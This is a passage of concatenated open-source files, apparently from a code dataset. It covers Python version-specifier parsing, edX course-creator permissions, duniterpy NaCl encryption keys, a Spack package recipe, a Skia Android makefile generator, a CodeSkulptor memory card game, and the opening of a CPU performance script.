(?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*)
)?
# You cannot use a wild card and a dev or local version
# together so group them with a | and make them optional.
(?:
(?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release
(?:\+[a-z0-9]+(?:[-_\.][a-z0-9]+)*)? # local
|
\.\* # Wild card syntax of .*
)?
)
|
(?:
# The compatible operator requires at least two digits in the
# release segment.
(?<=~=) # Only match for the compatible operator
\s*
v?
(?:[0-9]+!)? # epoch
[0-9]+(?:\.[0-9]+)+ # release (We have a + instead of a *)
(?: # pre release
[-_\.]?
(a|b|c|rc|alpha|beta|pre|preview)
[-_\.]?
[0-9]*
)?
(?: # post release
(?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*)
)?
(?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release
)
|
(?:
# All other operators only allow a sub set of what the
# (non)equality operators do. Specifically they do not allow
# local versions to be specified nor do they allow the prefix
# matching wild cards.
(?<!==|!=|~=) # We have special cases for these
# operators so we want to make sure they
# don't match here.
\s*
v?
(?:[0-9]+!)? # epoch
[0-9]+(?:\.[0-9]+)* # release
(?: # pre release
[-_\.]?
(a|b|c|rc|alpha|beta|pre|preview)
[-_\.]?
[0-9]*
)?
(?: # post release
(?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*)
)?
(?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release
)
)
"""
)
_regex = re.compile(
r"^\s*" + _regex_str + r"\s*$", re.VERBOSE | re.IGNORECASE)
_operators = {
"~=": "compatible",
"==": "equal",
"!=": "not_equal",
"<=": "less_than_equal",
">=": "greater_than_equal",
"<": "less_than",
">": "greater_than",
"===": "arbitrary",
}
@_require_version_compare
def _compare_compatible(self, prospective, spec):
# Compatible releases have an equivalent combination of >= and ==. That
# is that ~=2.2 is equivalent to >=2.2,==2.*. This allows us to
# implement this in terms of the other specifiers instead of
# implementing it ourselves. The only thing we need to do is construct
# the other specifiers.
# We want everything but the last item in the version, but we want to
# ignore post and dev releases and we want to treat the pre-release as
        # its own separate segment.
prefix = ".".join(
list(
itertools.takewhile(
lambda x: (not x.startswith("post") and not
x.startswith("dev")),
_version_split(spec),
)
)[:-1]
)
# Add the prefix notation to the end of our string
prefix += ".*"
return (self._get_operator(">=")(prospective, spec) and
self._get_operator("==")(prospective, prefix))
@_require_version_compare
def _compare_equal(self, prospective, spec):
# We need special logic to handle prefix matching
if spec.endswith(".*"):
# In the case of prefix matching we want to ignore local segment.
prospective = Version(prospective.public)
# Split the spec out by dots, and pretend that there is an implicit
# dot in between a release segment and a pre-release segment.
spec = _version_split(spec[:-2]) # Remove the trailing .*
# Split the prospective version out by dots, and pretend that there
# is an implicit dot in between a release segment and a pre-release
# segment.
prospective = _version_split(str(prospective))
# Shorten the prospective version to be the same length as the spec
# so that we can determine if the specifier is a prefix of the
# prospective version or not.
prospective = prospective[:len(spec)]
# Pad out our two sides with zeros so that they both equal the same
# length.
spec, prospective = _pad_version(spec, prospective)
else:
# Convert our spec string into a Version
spec = Version(spec)
# If the specifier does not have a local segment, then we want to
# act as if the prospective version also does not have a local
# segment.
if not spec.local:
prospective = Version(prospective.public)
return prospective == spec
@_require_version_compare
def _compare_not_equal(self, prospective, spec):
return not self._compare_equal(prospective, spec)
@_require_version_compare
def _compare_less_than_equal(self, prospective, spec):
return prospective <= Version(spec)
@_require_version_compare
def _compare_greater_than_equal(self, prospective, spec):
return prospective >= Version(spec)
@_require_version_compare
def _compare_less_than(self, prospective, spec):
# Convert our spec to a Version instance, since we'll want to work with
# it as a version.
spec = Version(spec)
# Check to see if the prospective version is less than the spec
# version. If it's not we can short circuit and just return False now
# instead of doing extra unneeded work.
if not prospective < spec:
return False
# This special case is here so that, unless the specifier itself
        # includes a pre-release version, we do not accept pre-release
# versions for the version mentioned in the specifier (e.g. <3.1 should
# not match 3.1.dev0, but should match 3.0.dev0).
if not spec.is_prerelease and prospective.is_prerelease:
if Version(prospective.base_version) == Version(spec.base_version):
return False
# If we've gotten to here, it means that prospective version is both
# less than the spec version *and* it's not a pre-release of the same
# version in the spec.
return True
@_require_version_compare
def _compare_greater_than(self, prospective, spec):
# Convert our spec to a Version instance, since we'll want to work with
# it as a version.
spec = Version(spec)
# Check to see if the prospective version is greater than the spec
# version. If it's not we can short circuit and just return False now
# instead of doing extra unneeded work.
if not prospective > spec:
return False
# This special case is here so that, unless the specifier itself
        # includes a post-release version, we do not accept
# post-release versions for the version mentioned in the specifier
# (e.g. >3.1 should not match 3.0.post0, but should match 3.2.post0).
if not spec.is_postrelease and prospective.is_postrelease:
if Version(prospective.base_version) == Version(spec.base_version):
return False
# Ensure that we do not allow a local version of the version mentioned
        # in the specifier, which is technically greater than, to match.
if prospective.local is not None:
if Version(prospective.base_version) == Version(spec.base_version):
return False
# If we've gotten to here, it means that prospective version is both
# greater than the spec version *and* it's not a pre-release of the
# same version in the spec.
return True
def _compare_arbitrary(self, prospective, spec):
return str(prospective).lower() == str(spec).lower()
@property
def prereleases(self):
# If there is an explicit prereleases set for this, then we'll just
# blindly use that.
if self._prereleases is not None:
return self._prereleases
# Look at all of our specifiers and determine if they are inclusive
# operators, and if they are if they are including an explicit
# prerelease.
operator, version = self._spec
if operator in ["==", ">=", "<=", "~=", "==="]:
# The == specifier can include a trailing .*, if it does we
# want to remove before parsing.
if operator == "==" and version.endswith(".*"):
version = version[:-2]
# Parse the version, and if it is a pre-release than this
# specifier allows pre-releases.
if parse(version).is_prerelease:
return True
return False
@prereleases.setter
def prereleases(self, value):
self._prereleases = value
_prefix_regex = re.compile(r"^([0-9]+)((?:a|b|c|rc)[0-9]+)$")
def _version_split(version):
result = []
for item in version.split("."):
match = _prefix_regex.search(item)
if match:
result.extend(match.groups())
else:
result.append(item)
return result
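# Worked examples (added comment, not part of the original module):
#   _version_split("2.1.3")  -> ["2", "1", "3"]
#   _version_split("1.0rc2") -> ["1", "0", "rc2"]
# (the pre-release suffix is split off by _prefix_regex above)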
def _pad_version(left, right):
left_split, right_split = [], []
# Get the release segment of our versions
left_split.append(list(itertools.takewhile(lambda x: x.isdigit(), left)))
right_split.append(list(itertools.takewhile(lambda x: x.isdigit(), right)))
# Get the rest of our versions
left_split.append(left[len(left_split[0]):])
right_split.append(right[len(right_split[0]):])
# Insert our padding
left_split.insert(
1,
["0"] * max(0, len(right_split[0]) - len(left_split[0])),
)
right_split.insert(
1,
["0"] * max(0, len(left_split[0]) - len(right_split[0])),
)
return (
list(itertools.chain(*left_split)),
list(itertools.chain(*right_split)),
)
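# Worked example (added comment, not part of the original module):
#   _pad_version(["1", "2"], ["1", "2", "3"])
#       -> (["1", "2", "0"], ["1", "2", "3"])
# i.e. the shorter release segment is right-padded with "0" so both sides
# compare with the same number of release components.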
class SpecifierSet(BaseSpecifier):
def __init__(self, specifiers="", prereleases=None):
        # Split on , to break each individual specifier into its own item, and
# strip each item to remove leading/trailing whitespace.
specifiers = [s.strip() for s in specifiers.split(",") if s.strip()]
# Parsed each individual specifier, attempting first to make it a
# Specifier and falling back to a LegacySpecifier.
parsed = set()
for specifier in specifiers:
try:
parsed.add(Specifier(specifier))
except InvalidSpecifier:
parsed.add(LegacySpecifier(specifier))
# Turn our parsed specifiers into a frozen set and save them for later.
self._specs = frozenset(parsed)
# Store our prereleases value so we can use it later to determine if
# we accept prereleases or not.
self._prereleases = prereleases
def __repr__(self):
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<SpecifierSet({0!r}{1})>".format(str(self), pre)
def __str__(self):
return ",".join(sorted(str(s) for s in self._specs))
def __hash__(self):
return hash(self._specs)
def __and__(self, other):
if isinstance(other, string_types):
other = SpecifierSet(other)
elif not isinstance(other, SpecifierSet):
return NotImplemented
specifier = SpecifierSet()
specifier._specs = frozenset(self._specs | other._specs)
if self._prereleases is None and other._prereleases is not None:
specifier._prereleases = other._prereleases
elif self._prereleases is not None and other._prereleases is None:
specifier._prereleases = self._prereleases
elif self._prereleases == other._prereleases:
specifier._prereleases = self._prereleases
else:
raise ValueError(
"Cannot combine SpecifierSets with True and False prerelease "
"overrides."
)
return specifier
def __eq__(self, other):
if isinstance(other, string_types):
other = SpecifierSet(other)
elif isinstance(other, _IndividualSpecifier):
other = SpecifierSet(str(other))
elif not isinstance(other, SpecifierSet):
return NotImplemented
return self._specs == other._specs
def __ne__(self, other):
if isinstance(other, string_types):
other = SpecifierSet(other)
elif isinstance(other, _IndividualSpecifier):
other = SpecifierSet(str(other))
elif not isinstance(other, SpecifierSet):
return NotImplemented
return self._specs != other._specs
def __len__(self):
return len(self._specs)
def __iter__(self):
return iter(self._specs)
@property
def prereleases(self):
# If we have been given an explicit prerelease modifier, then we'll
# pass that through here.
if self._prereleases is not None:
return self._prereleases
# If we don't have any specifiers, and we don't have a forced value,
# then we'll just return None since we don't know if this should have
# pre-releases or not.
if not self._specs:
return None
# Otherwise we'll see if any of the given specifiers accept
# prereleases, if any of them do we'll return True, otherwise False.
return any(s.prereleases for s in self._specs)
@prereleases.setter
def prereleases(self, value):
self._prereleases = value
def __contains__(self, item):
return self.contains(item)
def contains(self, item, prereleases=None):
# Ensure that our item is a Version or LegacyVersion instance.
if not isinstance(item, (LegacyVersion, Version)):
item = parse(item)
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# We can determine if we're going to allow pre-releases by looking to
# see if any of the underlying items supports them. If none of them do
# and this item is a pre-release then we do not allow it and we can
# short circuit that here.
# Note: This means that 1.0.dev1 would not be contained in something
        # like >=1.0.devabc, however it would be in >=1.0.devabc,>0.0.dev0
if not prereleases and item.is_prerelease:
return False
# We simply dispatch to the underlying specs here to make sure that the
# given version is contained within all of them.
# Note: This use of all() here means that an empty set of specifiers
# will always return True, this is an explicit design decision.
return all(
s.contains(item, prereleases=prereleases)
for s in self._specs
)
def filter(self, iterable, prereleases=None):
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# If we have any specifiers, then we want to wrap our iterable in the
# filter method for each one, this will act as a logical AND amongst
# each specifier.
if self._specs:
for spec in self._specs:
iterable = spec.filter(iterable, prereleases=bool(prereleases))
return iterable
# If we do not have any specifiers, then we need to have a rough filter
# which will filter out any pre-releases, unless there are no final
# releases, and which will filter out LegacyVersion in general.
else:
filtered = []
found_prereleases = []
for item in iterable:
                # Ensure that we have some kind of Version class for this item.
if not isinstance(item, (LegacyVersion, Version)):
parsed_version = parse(item)
else:
parsed_version = item
# Filter out any item which is parsed as a LegacyVersion
if isinstance(parsed_version, LegacyVersion):
continue
# Store any item which is a pre-release for later unless we've
# already found a final version or we are accepting prereleases
if parsed_version.is_prerelease and not prereleases:
if not filtered:
found_prereleases.append(item)
else:
filtered.append(item)
# If we've found no items except for pre-releases, then we'll go
# ahead and use the pre-releases
if not filtered and found_prereleases and prereleases is None:
return found_prereleases
return filtered
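# Illustrative usage (added comment, not part of the original module):
#
#   SpecifierSet(">=1.0,<2.0").contains("1.4")       -> True
#   SpecifierSet(">=1.0,<2.0").contains("2.0.dev1")  -> False  (pre-releases
#                                        are excluded unless explicitly allowed)
#   list(SpecifierSet(">=1.0").filter(["0.9", "1.1", "2.0a1"])) -> ["1.1"]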
| mit |
openiitbombayx/edx-platform | cms/djangoapps/course_creators/views.py | 230 | 3176 | """
Methods for interacting programmatically with the user creator table.
"""
from course_creators.models import CourseCreator
from student.roles import CourseCreatorRole
from student import auth
def add_user_with_status_unrequested(user):
"""
Adds a user to the course creator table with status 'unrequested'.
If the user is already in the table, this method is a no-op
(state will not be changed).
If the user is marked as is_staff, this method is a no-op (user
will not be added to table).
"""
_add_user(user, CourseCreator.UNREQUESTED)
def add_user_with_status_granted(caller, user):
"""
Adds a user to the course creator table with status 'granted'.
If appropriate, this method also adds the user to the course creator group maintained by authz.py.
Caller must have staff permissions.
If the user is already in the table, this method is a no-op
(state will not be changed).
If the user is marked as is_staff, this method is a no-op (user
will not be added to table, nor added to authz.py group).
"""
if _add_user(user, CourseCreator.GRANTED):
update_course_creator_group(caller, user, True)
def update_course_creator_group(caller, user, add):
"""
Method for adding and removing users from the creator group.
Caller must have staff permissions.
"""
if add:
auth.add_users(caller, CourseCreatorRole(), user)
else:
auth.remove_users(caller, CourseCreatorRole(), user)
def get_course_creator_status(user):
"""
Returns the status for a particular user, or None if user is not in the table.
Possible return values are:
'unrequested' = user has not requested course creation rights
'pending' = user has requested course creation rights
'granted' = user has been granted course creation rights
'denied' = user has been denied course creation rights
None = user does not exist in the table
"""
user = CourseCreator.objects.filter(user=user)
if user.count() == 0:
return None
else:
# User is defined to be unique, can assume a single entry.
return user[0].state
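# Illustrative usage (added comment; `request.user` is a hypothetical caller):
#
#   state = get_course_creator_status(request.user)
#   if state is None:
#       add_user_with_status_unrequested(request.user)
#   elif state == CourseCreator.PENDING:
#       pass  # show "request pending" UI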
def user_requested_access(user):
"""
User has requested course creator access.
This changes the user state to CourseCreator.PENDING, unless the user
state is already CourseCreator.GRANTED, in which case this method is a no-op.
"""
user = CourseCreator.objects.get(user=user)
if user.state != CourseCreator.GRANTED:
user.state = CourseCreator.PENDING
user.save()
def _add_user(user, state):
"""
Adds a user to the course creator table with the specified state.
Returns True if user was added to table, else False.
If the user is already in the table, this method is a no-op
(state will not be changed, method will return False).
If the user is marked as is_staff, this method is a no-op (False will be returned).
"""
if not user.is_staff and CourseCreator.objects.filter(user=user).count() == 0:
entry = CourseCreator(user=user, state=state)
entry.save()
return True
return False
| agpl-3.0 |
vtexier/duniter-python-api | duniterpy/key/encryption_key.py | 1 | 1634 | """
duniter public and private keys
@author: inso
"""
import libnacl.public
from pylibscrypt import scrypt
from .base58 import Base58Encoder
from .signing_key import _ensure_bytes
SEED_LENGTH = 32 # Length of the key
crypto_sign_BYTES = 64
SCRYPT_PARAMS = {'N': 4096,
'r': 16,
'p': 1
}
class SecretKey(libnacl.public.SecretKey):
def __init__(self, salt, password):
salt = _ensure_bytes(salt)
password = _ensure_bytes(password)
seed = scrypt(password, salt,
SCRYPT_PARAMS['N'], SCRYPT_PARAMS['r'], SCRYPT_PARAMS['p'],
SEED_LENGTH)
super().__init__(seed)
self.public_key = PublicKey(Base58Encoder.encode(self.pk))
def encrypt(self, pubkey, noonce, text):
text_bytes = _ensure_bytes(text)
noonce_bytes = _ensure_bytes(noonce)
recipient_pubkey = PublicKey(pubkey)
crypt_bytes = libnacl.public.Box(self, recipient_pubkey).encrypt(text_bytes, noonce_bytes)
return Base58Encoder.encode(crypt_bytes[24:])
def decrypt(self, pubkey, noonce, text):
sender_pubkey = PublicKey(pubkey)
noonce_bytes = _ensure_bytes(noonce)
encrypt_bytes = Base58Encoder.decode(text)
decrypt_bytes = libnacl.public.Box(self, sender_pubkey).decrypt(encrypt_bytes, noonce_bytes)
return decrypt_bytes.decode('utf-8')
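# Illustrative round trip (added comment; salt, password and nonce values are
# hypothetical -- the nonce must be 24 bytes long and shared by both parties):
#
#   alice = SecretKey("alice_salt", "alice_password")
#   bob = SecretKey("bob_salt", "bob_password")
#   nonce = "000000000000000000000001"
#   cipher = alice.encrypt(bob.public_key.base58(), nonce, "hello")
#   assert bob.decrypt(alice.public_key.base58(), nonce, cipher) == "hello"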
class PublicKey(libnacl.public.PublicKey):
def __init__(self, pubkey):
key = Base58Encoder.decode(pubkey)
super().__init__(key)
def base58(self):
return Base58Encoder.encode(self.pk)
| gpl-3.0 |
tmerrick1/spack | var/spack/repos/builtin/packages/py-packaging/package.py | 5 | 2098 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPackaging(PythonPackage):
"""Core utilities for Python packages."""
homepage = "https://github.com/pypa/packaging"
url = "https://pypi.io/packages/source/p/packaging/packaging-17.1.tar.gz"
import_modules = ['packaging']
version('17.1', '8baf8241d1b6b0a5fae9b00f359976a8')
version('16.8', '53895cdca04ecff80b54128e475b5d3b')
# Not needed for the installation, but used at runtime
depends_on('py-six', type='run')
depends_on('py-pyparsing', type='run')
# Newer versions of setuptools require packaging. Although setuptools is an
# optional dependency of packaging, if it is not found, setup.py will
# fallback on distutils.core instead. Don't add a setuptools dependency
# or we won't be able to bootstrap setuptools.
# depends_on('py-setuptools', type='build')
| lgpl-2.1 |
Igalia/skia | platform_tools/android/bin/gyp_to_android.py | 44 | 8982 | #!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Script for generating the Android framework's version of Skia from gyp
files.
"""
import argparse
import os
import shutil
import sys
import tempfile
# Find the top of trunk
SCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))
SKIA_DIR = os.path.normpath(os.path.join(SCRIPT_DIR, os.pardir, os.pardir,
os.pardir))
# Find the directory with our helper files, and add it to the path.
ANDROID_TOOLS = os.path.join(SKIA_DIR, 'platform_tools', 'android')
sys.path.append(ANDROID_TOOLS)
import gyp_gen.android_framework_gyp as android_framework_gyp
import gyp_gen.gypd_parser as gypd_parser
import gyp_gen.generate_user_config as generate_user_config
import gyp_gen.makefile_writer as makefile_writer
import gyp_gen.tool_makefile_writer as tool_makefile_writer
import gyp_gen.vars_dict_lib as vars_dict_lib
# Folder containing all gyp files and generated gypd files.
GYP_FOLDER = 'gyp'
def generate_var_dict(target_dir, target_file, skia_arch_type, have_neon,
gyp_source_dir):
"""Create a VarsDict for a particular arch type.
  Each parameter is passed directly to android_framework_gyp.main().
Args:
target_dir: Directory containing gyp files.
target_file: Target gyp file.
skia_arch_type: Target architecture.
have_neon: Whether the target should build for neon.
gyp_source_dir: Directory for gyp source.
Returns:
A VarsDict containing the variable definitions determined by gyp.
"""
result_file = android_framework_gyp.main(target_dir, target_file,
skia_arch_type, have_neon,
gyp_source_dir)
var_dict = vars_dict_lib.VarsDict()
gypd_parser.parse_gypd(var_dict, result_file, '.')
android_framework_gyp.clean_gypd_files(target_dir)
print '.',
return var_dict
def main(target_dir=None, require_sk_user_config=False, gyp_source_dir=None):
"""Create Android.mk for the Android framework's external/skia.
Builds Android.mk using Skia's gyp files.
Args:
target_dir: Directory in which to place 'Android.mk'. If None, the file
will be placed in skia's root directory.
require_sk_user_config: If True, raise an AssertionError if
SkUserConfig.h does not exist.
gyp_source_dir: Source directory for gyp.
"""
# Create a temporary folder to hold gyp and gypd files. Create it in SKIA_DIR
# so that it is a sibling of gyp/, so the relationships between gyp files and
# other files (e.g. platform_tools/android/gyp/dependencies.gypi, referenced
# by android_deps.gyp as a relative path) is unchanged.
# Use mkdtemp to find an unused folder name, but then delete it so copytree
# can be called with a non-existent directory.
tmp_folder = tempfile.mkdtemp(dir=SKIA_DIR)
os.rmdir(tmp_folder)
shutil.copytree(os.path.join(SKIA_DIR, GYP_FOLDER), tmp_folder)
try:
main_gyp_file = 'android_framework_lib.gyp'
print 'Creating Android.mk',
# Generate a separate VarsDict for each architecture type. For each
# archtype:
# 1. call android_framework_gyp.main() to generate gypd files
# 2. call parse_gypd to read those gypd files into the VarsDict
# 3. delete the gypd files
#
# Once we have the VarsDict for each architecture type, we combine them all
# into a single Android.mk file, which can build targets of any
# architecture type.
    # The default uses a non-existent archtype, to find all the general
# variable definitions.
default_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'other',
False, gyp_source_dir)
arm_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm', False,
gyp_source_dir)
arm_neon_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm',
True, gyp_source_dir)
x86_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'x86', False,
gyp_source_dir)
x86_64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'x86_64',
False, gyp_source_dir)
mips_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips', False,
gyp_source_dir)
mips64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips64',
False, gyp_source_dir)
arm64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm64',
False, gyp_source_dir)
# Compute the intersection of all targets. All the files in the intersection
# should be part of the makefile always. Each dict will now contain trimmed
# lists containing only variable definitions specific to that configuration.
var_dict_list = [default_var_dict, arm_var_dict, arm_neon_var_dict,
x86_var_dict, x86_64_var_dict, mips_var_dict,
mips64_var_dict, arm64_var_dict]
common = vars_dict_lib.intersect(var_dict_list)
common.LOCAL_MODULE.add('libskia')
# Create SkUserConfig
user_config = os.path.join(SKIA_DIR, 'include', 'config', 'SkUserConfig.h')
if target_dir:
dst_dir = target_dir
else:
dst_dir = os.path.join(SKIA_DIR, 'include', 'core')
generate_user_config.generate_user_config(
original_sk_user_config=user_config,
require_sk_user_config=require_sk_user_config, target_dir=dst_dir,
defines=common.DEFINES)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='bench.gyp',
skia_trunk=target_dir,
dest_dir='bench',
skia_lib_var_dict=common,
local_module_name='skia_nanobench',
local_module_tags=['tests'],
desired_targets=['nanobench'],
gyp_source_dir=gyp_source_dir)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='dm.gyp',
skia_trunk=target_dir,
dest_dir='dm',
skia_lib_var_dict=common,
local_module_name='skia_dm',
local_module_tags=['tests'],
desired_targets=['dm'],
gyp_source_dir=gyp_source_dir)
# Now that the defines have been written to SkUserConfig and they've been
# used to skip adding them to the tools makefiles, they are not needed in
# Android.mk. Reset DEFINES.
common.DEFINES.reset()
# Further trim arm_neon_var_dict with arm_var_dict. After this call,
# arm_var_dict (which will now be the intersection) includes all definitions
# used by both arm and arm + neon, and arm_neon_var_dict will only contain
# those specific to arm + neon.
arm_var_dict = vars_dict_lib.intersect([arm_var_dict, arm_neon_var_dict])
# Now create a list of VarsDictData holding everything but common.
deviations_from_common = []
deviations_from_common.append(makefile_writer.VarsDictData(
arm_var_dict, 'arm'))
deviations_from_common.append(makefile_writer.VarsDictData(
arm_neon_var_dict, 'arm', 'ARCH_ARM_HAVE_NEON'))
deviations_from_common.append(makefile_writer.VarsDictData(x86_var_dict,
'x86'))
deviations_from_common.append(makefile_writer.VarsDictData(x86_64_var_dict,
'x86_64'))
deviations_from_common.append(makefile_writer.VarsDictData(mips_var_dict,
'mips'))
deviations_from_common.append(makefile_writer.VarsDictData(mips64_var_dict,
'mips64'))
deviations_from_common.append(makefile_writer.VarsDictData(arm64_var_dict,
'arm64'))
makefile_writer.write_android_mk(target_dir=target_dir,
common=common, deviations_from_common=deviations_from_common)
finally:
shutil.rmtree(tmp_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gyp_source_dir', help='Source of gyp program. '
'e.g. <path_to_skia>/third_party/externals/gyp')
args = parser.parse_args()
main(gyp_source_dir=args.gyp_source_dir)
| bsd-3-clause |
mr-ice/pipython | InteractiveProgramming/concentration.py | 1 | 7657 | # implementation of card game - Memory
# I originally coded this with timers for hiding the cards instead of hiding them
# on a mouse click. And I removed cards that matched instead of leaving them face up.
# I thought it worked pretty well but it didn't meet the requirements of the grading
# rubric, so I had to make changes. If you want to see that code, you can see it at
# http://www.codeskulptor.org/#user39_efDZwo8MIu_0.py
import simplegui
import random
from math import sqrt
cards = list() # list to hold the cards
card_size = 75 # x dimension of card (y dimension is calculated based on this)
margins = ( 20, 20 ) # spacing around edges
pad = ( 10, 10 ) # intercard spacing
##showtime = 700 # number of milliseconds to show revealed, unmatched cards
##matchtime = 350 # number of milliseconds to show revealed, matched cards
fontsize = 35 # size of the font for card faces
game = {
'over' : False,
'best' : 0,
'draws' : 0,
'drawn' : None,
'match' : None,
}
game_over_text = "Game Over!"
animated = False
animation_tick = 0
w = card_size # width of a card is the card_size
h = ((1 + sqrt(5)) / 2 ) *card_size # height of a card is phi times width
canvaswidth = margins[0] + 4 * (w + pad[0]) + margins[0]/2
canvasheight = margins[1] + 4 * (h + pad[1]) + margins[1]/2
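# Note added for clarity (not in the original): with card_size = 75 each card comes out at
# roughly 75 x 121 pixels (golden-ratio height), so the 4 x 4 grid plus margins and padding
# yields a canvas of about 370 x 555 pixels.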
for x in range(4):
for y in range(4):
xpos = margins[0] + x * ( w + pad[0] ) - 0.5
ypos = margins[1] + y * ( h + pad[1] ) - 0.5
# remember: x is horizontal offset, y is vertical offset
cards.append( { 'location' : { 'x' : xpos, 'y' : ypos },
'value' : 'A',
'size' : { 'x' : w, 'y' : h },
'face' : False,
'color' : '#990033',
'fill' : '#009933',
'fontcolor' : 'yellow',
'fontsize' : fontsize,
'linewidth' : 2,
'drawn' : True,
})
def initialize_cards():
global cards
card_values = range(8) + range(8)
random.shuffle(card_values)
for i in range(len(card_values)):
cards[i]['value'] = card_values[i]
cards[i]['face'] = False
cards[i]['drawn'] = True
def draw_card( card, canvas ):
if not card['drawn']: return
x = card['location']['x']
y = card['location']['y']
w = card['size']['x']
h = card['size']['y']
# location of this card, set of points describing a rectangle
loc = [
( x, y ),
( x, y+h ),
( x+w, y+h ),
( x+w, y),
]
# decoration on this card, set of points describing a diamond in the rectangle
dec = [
( x + w/2, y ),
( x + w, y + h/2 ),
( x + w/2, y + h ),
( x, y + h/2 ),
]
tx = x + w/2 - card['fontsize']/4
ty = y + h/2 + card['fontsize']/4
canvas.draw_polygon(loc, card['linewidth'], card['color'], card['fill'])
if card['face']:
canvas.draw_text(str(card['value']), (tx,ty), card['fontsize'], card['fontcolor'])
else:
canvas.draw_polygon(dec, card['linewidth'], card['color'])
canvas.draw_text("?", (tx, ty), card['fontsize'], card['color'])
def hide_all():
for card in cards:
card['face'] = False
if showtimer.is_running(): showtimer.stop()
def show_all():
for card in cards:
card['face'] = True
if showtimer.is_running(): showtimer.stop()
def hide_matches():
game['drawn']['drawn'] = False
game['drawn'] = False
game['match']['drawn'] = False
game['match'] = False
if matchtimer.is_running(): matchtimer.stop()
any = False
for card in cards:
any = any or card['drawn']
if not any:
if game['draws'] < game['best'] or game['best'] == 0: game['best'] = game['draws']
game['over'] = True
animationtimer.start()
# helper function to initialize globals
def new_game():
global animation_tick
initialize_cards()
game['draws'] = 0
game['drawn'] = False
game['match'] = False
game['over'] = False
## if showtimer.is_running(): showtimer.stop()
## if matchtimer.is_running(): matchtimer.stop()
if animationtimer.is_running(): animationtimer.stop()
animation_tick = 0
def clicked(card,pos):
if not card['drawn'] or card['face']: return False
x = card['location']['x']
y = card['location']['y']
w = card['size']['x']
h = card['size']['y']
return not ( pos[0] < x or pos[0] > x + w or pos[1] < y or pos[1] > y + h )
# define event handlers
def mouseclick(pos):
# add game state logic here
global cards, hidetimer, showtimer
## if showtimer.is_running() or matchtimer.is_running() or animated: return
if animated: return
all = True
for card in cards:
if clicked(card,pos):
card['face'] = True
if game['drawn'] and game['match']:
if game['drawn']['value'] != game['match']['value']:
game['drawn']['face'] = False
game['match']['face'] = False
game['drawn'] = None
game['match'] = None
if not game['drawn']:
game['drawn'] = card
elif not game['match']:
game['match'] = card
game['draws'] += 1
all = all and card['face']
if all:
if game['draws'] < game['best'] or game['best'] == 0: game['best'] = game['draws']
for card in cards:
card['drawn'] = False
game['over'] = True
animationtimer.start()
# cards are logically 50x100 pixels in size (or not, I set mine differently, above)
def draw(canvas):
global game_over
for card in cards:
draw_card(card,canvas)
label.set_text("Turns = " + str(game['draws']))
if game['best'] > 0:
best.set_text("Best = " + str(game['best']))
if game['over']:
game_over_width = frame.get_canvas_textwidth(game_over_text, animation_tick)
canvas.draw_text(game_over_text, ( canvaswidth/2 - game_over_width/2,
canvasheight/2 ), animation_tick, "red" )
if animation_tick >= fontsize*2:
animationtimer.stop()
def animation():
global animation_tick
animation_tick += 1
def game_over():
"""Prematurely end the game for debugging"""
for card in cards:
card['drawn'] = False
animationtimer.start()
game['over'] = True
# create frame and add a button and labels
frame = simplegui.create_frame("Concentration", canvaswidth, canvasheight)
line = frame.add_label("----------------------------")
label = frame.add_label("Turns = 0")
best = frame.add_label("Best = 0")
line = frame.add_label("----------------------------")
frame.add_button("Reset", new_game)
line = frame.add_label("----------------------------")
#line = frame.add_label("----------DEBUGGING---------")
#frame.add_button("Show All", show_all)
#frame.add_button("Hide All", hide_all)
#frame.add_button("Animate", animation)
#frame.add_button("Game Over", game_over)
# register event handlers
frame.set_mouseclick_handler(mouseclick)
frame.set_draw_handler(draw)
##showtimer = simplegui.create_timer(showtime,hide_all)
##matchtimer = simplegui.create_timer(matchtime,hide_matches)
animationtimer = simplegui.create_timer(10,animation)
# get things rolling
new_game()
frame.start()
# Always remember to review the grading rubric
| mit |
sbates130272/fio-stuff | tools/cpuperf.py | 1 | 3479 | #!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import subprocess as sp
import time
def get_ps_data(options):
try:
